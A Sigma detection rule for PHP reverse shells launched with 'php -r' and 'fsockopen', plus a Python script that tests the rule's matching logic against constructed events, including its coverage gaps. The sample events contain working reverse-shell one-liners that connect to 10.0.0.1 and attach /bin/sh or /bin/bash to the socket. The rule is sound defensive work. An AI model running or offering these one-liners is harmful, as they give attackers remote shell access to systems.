Potential PHP Reverse Shell
Detects use of the PHP CLI with the "-r" flag, which executes inline PHP code passed on the command line, where that command line also calls "fsockopen" (which opens a network socket) and names a shell binary. Attackers typically pair the socket with a command-execution function such as "exec" or "proc_open" so that the shell's standard input and output are attached to the socket, yielding a reverse shell.
Sigma rule
```yaml
title: Potential PHP Reverse Shell
id: c6714a24-d7d5-4283-a36b-3ffd091d5f7e
status: test
description: |
    Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
    Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-07
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: '/php'
        CommandLine|contains|all:
            - ' -r '
            - 'fsockopen'
        CommandLine|contains:
            - 'ash'
            - 'bash'
            - 'bsh'
            - 'csh'
            - 'ksh'
            - 'pdksh'
            - 'sh'
            - 'tcsh'
            - 'zsh'
    condition: selection
falsepositives:
    - Unknown
level: high
```
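The following is an added example, not part of the rule or the Sigma project, that re-implements the selection logic above in Python and runs it over a handful of constructed process_creation events (the events and the `matches_rule` / `shell_terms_hit` helpers are assumptions made for illustration). It shows a pentestmonkey-style `fsockopen` + `exec` one-liner and a `proc_open` variant firing, a benign `php -r` invocation not firing, and two ways the same payload escapes the rule: delivering the PHP from a file instead of `-r`, or using an interpreter whose image path does not contain `/php`. It also shows that the `'sh'` entry in the shell list is a substring of every other entry (and of words such as `shell_exec`), so the list adds no precision beyond `'sh'` on its own.

```python
# Sigma "contains" matching is case-insensitive, so everything is lowercased first.
SHELL_TERMS = ["ash", "bash", "bsh", "csh", "ksh", "pdksh", "sh", "tcsh", "zsh"]

# Constructed sample events (not real telemetry); fields mirror the Sigma
# process_creation field names used by the rule.
SAMPLE_EVENTS = [
    {   # pentestmonkey-style reverse shell: socket handed to an interactive sh
        "Image": "/usr/bin/php",
        "CommandLine": "php -r '$sock=fsockopen(\"10.0.0.1\",1234);"
                       "exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    },
    {   # proc_open variant with bash, versioned php binary
        "Image": "/usr/local/bin/php8.2",
        "CommandLine": "php8.2 -r '$s=fsockopen(\"10.0.0.1\",4444);"
                       "proc_open(\"/bin/bash -i\",array(0=>$s,1=>$s,2=>$s),$p);'",
    },
    {   # benign inline PHP: -r is present but no socket is opened
        "Image": "/usr/bin/php",
        "CommandLine": "php -r 'echo phpversion();'",
    },
    {   # same payload saved to a file: no ' -r ' on the command line, rule misses it
        "Image": "/usr/bin/php",
        "CommandLine": "php /tmp/shell.php",
    },
    {   # different interpreter: Image does not contain '/php', rule does not apply
        "Image": "/usr/bin/python3",
        "CommandLine": "python3 -c 'import socket,os,pty; ...'",
    },
]


def shell_terms_hit(command_line):
    """Return the entries of the rule's shell list that occur in the command line."""
    cmd = command_line.lower()
    return [term for term in SHELL_TERMS if term in cmd]


def matches_rule(event):
    """Evaluate the rule's 'selection' against one process_creation event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    # Image|contains: '/php'
    if "/php" not in image:
        return False
    # CommandLine|contains|all: ' -r ' and 'fsockopen'
    if " -r " not in cmd or "fsockopen" not in cmd:
        return False
    # CommandLine|contains: any of the shell names
    return bool(shell_terms_hit(cmd))


def evaluate(events):
    """Run the rule over a list of events and return one verdict per event."""
    return [matches_rule(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(("ALERT " if hit else "      ") + event["CommandLine"][:70])
```

Because `'sh'` is contained in every other list entry, `shell_terms_hit` reports `['ash', 'bash', 'sh']` for the bash event and `['sh']` for the `/bin/sh` event; the rule would fire identically if the list held only `'sh'`. The two misses in the sample set (file-based payload, non-PHP interpreter) are not defects of this rule so much as its scope: it targets inline `-r` execution only, and a companion rule is needed for PHP scripts run from disk.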